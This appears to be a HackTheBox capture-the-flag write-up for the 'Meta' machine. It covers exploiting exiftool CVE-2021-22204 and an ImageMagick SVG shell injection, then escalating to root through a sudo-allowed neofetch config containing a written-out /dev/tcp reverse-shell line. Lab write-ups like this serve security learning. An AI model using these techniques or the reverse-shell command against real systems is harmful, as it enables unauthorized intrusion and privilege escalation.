This is a writeup for the Meta machine from the HackTheBox site.
First, let's start with a scan of our target with the following command:
nmap -sV -T4 -Pn 10.129.119.94
Two TCP ports are discovered:
- 22/tcp : SSH port (OpenSSH 7.9p1)
- 80/tcp : HTTP web server (Apache httpd)
At first I order by listing the different pages of the site.
Nothing in particular, I continue by making an enumeration of the subdomains.
Ok, there is a subdomain, I add it to the
/etc/hosts file, then I access it via a browser.
It is a page that redirects us to another page that contains a form to upload a file.
So I try to upload an image to see what the page tells me:
The result reminds me strongly of a crypto tool I already used:
So I know that on the server side, this tool is used, it's a good information ! So I look if there are exploits with this service. Quickly I find this flaw : CVE-2021-22204. It is an exploit that allows via meta data in an image the execution of instructions. So we can create a reverse shell ! With a little more research I find this github.
It is a tool for image modification and reverse shell insertion.
┌──(d3vyce㉿kali)-[~] └─$ python3 exploit.py 1 image files updated
Once the image is modified, I upload it and it creates the reverse shell:
I look for the location of the flag with the following command:
find / -name user.txt 2>/dev/null
I find that the flag is in
thomas personal file, but I don't have the rights to read it...
So I am looking for a way to change the user. In the site folder, I find a folder
convert_image... It is said to be an input folder for a script or a service that would convert images. I am looking for other elements with the same name on the system:
www-data@meta:/var/www/dev01.artcorp.htb/convert_images$ find / -name convert_image* 2>/dev/null <ert_images$ find / -name convert_image* 2>/dev/null /usr/local/bin/convert_images.sh /var/www/dev01.artcorp.htb/convert_images
There is a script with the same name! Looking at the content, I can see that it uses the
mogrify service to perform the conversion of the images in the folder.
I look for the version of the service with the following command:
Then I look if there are some feats. After some research I find this exploit. It allows to do a shell injection in an SVG image.
So I use the template provided in the article, then I modify it to get the content of the
id_rsa file of the user
Then I copy the file to the
convert_images folder. After a few seconds I find the newly created file in the
Now that I have this file, I add the privileges and create an SSH session:
I now have a shell as
thomas and I get the first flag.
I start by checking the sudo permissions of my user. I notice 2 things:
- I have the right to use the command
/usr/bin/neofetch \"\"as root
- The environment variable
XDG_CONFIG_HOMEis kept when running sudo
After some research, I find that
neofetch has a file in configuration in the folder
~/.config/neofetch/. So I start by putting a reverse shell in this config file.
thomas@meta:~/.config/neofetch$ cd .config/neofetch/ thomas@meta:~/.config/neofetch$ echo "/bin/sh -i >& /dev/tcp/10.10.14.40/2345 0>&1" > config.conf
Then I set the variable
XDG_CONFIG_HOME with the
.local of my user. Then I run
neofetch as sudo.
thomas@meta:~/.config/neofetch$ export XDG_CONFIG_HOME="$HOME/.config" thomas@meta:~/.config/neofetch$ sudo -u root /usr/bin/neofetch \"\"
I now have a reverse shell
root and I can get the last flag.
To patch this host I think it would be necessary to perform a number of actions:
exiftoolto avoid CVE-2021-22204
mogrifyto avoid shell injection exploit
- Disable the option to keep the
XDG_CONFIG_HOMEvariable at runtime with sudo